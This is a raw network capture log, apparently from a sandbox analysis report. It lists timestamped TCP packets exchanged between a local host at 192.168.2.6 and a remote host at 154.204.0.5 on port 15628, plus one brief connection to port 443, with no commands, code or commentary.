Jul 20, 2024 16:31:31.693526983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.693579912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.698447943 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.698497057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.703397036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.703460932 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.709269047 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.709317923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.715668917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.715724945 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.721497059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.721559048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.726679087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.726735115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.731551886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.731620073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.741493940 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.741548061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.747598886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.747648001 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.761002064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.761055946 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.769963980 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.770023108 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.808275938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.823703051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.823766947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.824126005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.830598116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.830653906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.836802959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.836853981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.845180988 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.845242023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.851752996 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.851802111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.857924938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.857980013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.864176035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.864232063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.869507074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.870852947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.877264977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.877322912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.882446051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.882494926 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.887429953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.887480974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.895010948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.895100117 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.901362896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.901408911 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.910079956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.910130024 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.915561914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.915620089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.921267033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.921325922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.928288937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.928340912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.933330059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.933382034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.938999891 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.939049959 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.944005966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.944056034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.949069977 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.949122906 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.955092907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.955138922 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.960242987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.960294962 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.965236902 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.965287924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.970088005 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.970134974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.976490021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.976552010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.981569052 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.981631041 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.988833904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.988903999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:31.994460106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:31.994518995 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.000855923 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.000910044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.007566929 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.007631063 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.013688087 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.013744116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.020034075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.020097971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.026875019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.026951075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.032306910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.032361984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.037192106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.037241936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.042481899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.042531013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.048054934 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.048104048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.053204060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.053262949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.059561014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.059643030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.066201925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.066261053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.071321011 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.071367979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.077173948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.077301025 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.082746029 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.082801104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.088116884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.088171005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.093157053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.093210936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.099229097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.099276066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.104841948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.104895115 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.109843016 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.109899044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.114718914 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.114782095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.120152950 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.120201111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.139712095 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.139771938 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.144861937 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.144933939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.150788069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.155611992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.160434961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.160494089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.165340900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.165405035 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.170227051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.170285940 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.175124884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.175179005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.180054903 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.180103064 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.185035944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.185096979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.189924955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.189980030 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.194955111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.195007086 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.200247049 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.200304985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.205152035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.205202103 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.210270882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.210321903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.215151072 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.215199947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.220534086 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.220586061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.225600004 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.225651026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.230845928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.230901003 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.235699892 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.235754013 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.240628958 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.240679979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.246464014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.246515036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.251645088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.251705885 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.257436037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.257498026 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.262315989 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.262377977 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.267255068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.267309904 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.272197962 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.272263050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.277081013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.277132988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.282067060 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.282115936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.302788019 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.302862883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.324573040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.324665070 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.343832970 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.344475985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.352121115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.352513075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.363140106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.363965988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.376301050 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.376502037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.381901026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.382394075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.403722048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.409133911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.409451008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.411511898 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.411603928 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.419023991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.419137955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.425537109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.428020000 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.433104038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.433166981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.438694954 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.438862085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.444916010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.444983006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.451235056 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.451303005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.456408024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.456478119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.465730906 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.465796947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.474241972 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.474389076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.480453014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.481538057 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.486609936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.486840010 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.491950035 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.492096901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.497114897 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.497740984 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.504018068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.504106045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.510251045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.510471106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.537473917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.545368910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.545401096 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.545783997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.560417891 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.560523033 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.563735962 CEST	49754	443	192.168.2.6	35.227.223.56
Jul 20, 2024 16:31:32.563785076 CEST	443	49754	35.227.223.56	192.168.2.6
Jul 20, 2024 16:31:32.565995932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.566513062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.572108030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.572405100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.578341961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.578449011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.585570097 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.586289883 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.595622063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.596199989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.601250887 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.601452112 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.606945992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.609565973 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.616974115 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.617145061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.624089003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.624267101 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.629487038 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.630505085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.636428118 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.636744022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.642282009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.642515898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.649758101 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.650399923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.655730963 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.656255007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.661946058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.665813923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.671181917 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.673646927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.681055069 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.681561947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.689337015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.689946890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.695202112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.695501089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.700845003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.700959921 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.707228899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.709855080 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.715713024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.717608929 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.726226091 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.726727009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.731596947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.734116077 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.742687941 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.745703936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.753312111 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.753581047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.758475065 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.761864901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.766814947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.769610882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.775285006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.775612116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.780719995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.781040907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.787018061 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.790055037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.800093889 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.801739931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.807459116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.808226109 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.814349890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.817842007 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.825592995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.829646111 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.834952116 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.837697029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.854306936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.857655048 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.862498045 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.865888119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.874223948 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.874471903 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.879720926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.879930019 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.884871960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.885343075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.890502930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:32.890794039 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:32.895688057 CEST	15628	49722	154.204.0.5	192.168.2.6
